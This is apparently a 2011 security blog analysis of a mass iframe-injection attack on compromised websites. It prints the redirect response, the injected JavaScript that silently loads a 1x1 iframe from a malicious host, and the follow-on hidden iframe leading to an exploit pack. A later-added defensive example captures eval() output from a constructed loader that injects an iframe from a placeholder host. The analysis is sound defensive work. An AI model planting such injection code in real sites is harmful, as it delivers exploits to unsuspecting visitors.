Wednesday, 27 July 2011

Willsy iFrame Attack on 90,000+ Sites

A large number of sites have been compromised in a mass iFrame injection attack that appears to lead to an exploit pack containing numerous exploits for Java, Flash and PDF vulnerabilities. The anatomy of the attack is shown below. A quick Google search turns up over 90,000 sites that have been hit.

On a compromised site, the iframe has been injected next to the title of the index page. When it is hit, the remote site is loaded and returns a 302 response that redirects to another site:

HTTP/1.1 302 Moved Temporarily
Date: Tue, 26 Jul 2011 21:39:47 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Location: http://pa<removed>cky.eu/ext/
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Connection: close
Content-Type: text/html
The redirect then leads to a page containing a single script element:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Pafe moved</title>
</head>
<body>
moved
<script type='text/javascript' src='http://ade<removed>rtes.es/images/info/js/js.php'></script>
</body>
</html>
The PHP page contains a single function responsible for loading an iframe. This iframe then leads to another site.

function vdeh() {
    // Wait until the document has at least four elements, then hang the
    // iframe off the fourth one; otherwise retry every 500 ms.
    if(document.all.length > 3) {
        var dch = document.createElement("iframe");
        dch.id = "dchid";
        dch.src = "http://lab<removed>ce.ru/iframe.php?id=0xxnnc3e8793z0nevu1f4o36ncdvg34";
        // 1x1 pixel, so the frame is effectively invisible to the visitor
        dch.style.width = "1px";
        dch.style.height = "1px";
        document.all[3].appendChild(dch);
    } else {
        setTimeout("vdeh()",500);
    }
}
setTimeout("vdeh()",500);
This link then leads to another page containing an iframe:

<iframe src="http://lee<removed>t.ru/forum.php?tp=206614280457fe96" width="1" height="1"></iframe>
This final iframe then loads the code responsible for delivering the exploit JavaScript. This code is heavily obfuscated and consists of a long string of digits in a DIV. The subsequent JavaScript is responsible for deobfuscating the string into JavaScript, which is then executed in an eval statement. The obfuscated code is shown below, along with the deobfuscated code. I used Firebug to easily remove any unnecessary code and reveal the final JavaScript:
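The Firebug approach above works by hand. The same idea can be done programmatically: run the loader with eval() shadowed by a function that records its argument instead of executing it, so the decoded script is captured without ever running in a browser. The code below is an added example written for this post, not the attack code itself. The loader and the digit-encoded DIV content are constructed to match the shape described above; the encoding is invented for illustration and is not the real loader's scheme, and the domain sploit.example is a placeholder.

```javascript
// Added example (not from the original post): capture what an obfuscated
// loader would pass to eval() without letting the decoded script run.
//
// Everything below the comment line is CONSTRUCTED for this example. It only
// mimics the shape the post describes (a long digit string in a DIV, decoded
// by a small script and handed to eval); the encoding is invented.

// Constructed "DIV text": the payload as fixed-width 3-digit char codes.
const FAKE_DIV_TEXT = (function () {
  const script = "var f = document.createElement('iframe'); " +
                 "f.src = 'http://sploit.example/x'; " +      // placeholder domain
                 "document.body.appendChild(f);";
  let out = "";
  for (const ch of script) out += ch.charCodeAt(0).toString().padStart(3, "0");
  return out;
})();

// Constructed loader: read the digits, rebuild the script, eval it.
// DIV_TEXT stands in for reading the DIV's innerHTML in a real page.
const FAKE_LOADER = `
  var d = DIV_TEXT;
  var s = "";
  for (var i = 0; i < d.length; i += 3) {
    s += String.fromCharCode(parseInt(d.substr(i, 3), 10));
  }
  eval(s);
`;

// Run untrusted loader source with eval() shadowed by a recorder.
// A parameter named "eval" is only legal in sloppy mode, which is what the
// Function constructor gives us. Inside the body the identifier eval then
// resolves to our recorder rather than the real eval, so the decoded
// script is captured instead of executed (and never touches `document`).
function captureEvalCalls(loaderSource, scope) {
  const captured = [];
  const recorder = function (code) {
    captured.push(String(code));
    return undefined; // deliberately do not run it
  };
  const names = Object.keys(scope);
  const fn = new Function("eval", ...names, loaderSource);
  fn(recorder, ...names.map((n) => scope[n]));
  return captured;
}

// Decode the constructed sample and return the captured script(s).
function demo() {
  return captureEvalCalls(FAKE_LOADER, { DIV_TEXT: FAKE_DIV_TEXT });
}

if (typeof require !== "undefined" && require.main === module) {
  for (const code of demo()) console.log("eval() would have run:\n" + code);
}
```

Shadowing eval this way only catches calls spelled `eval(...)` in the loader's own scope; a loader that reaches it through `window.eval`, `new Function` or `setTimeout(string)` needs those hooked too, which is why running the sample in an isolated, instrumented browser profile remains the safer route for anything you have not read first.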
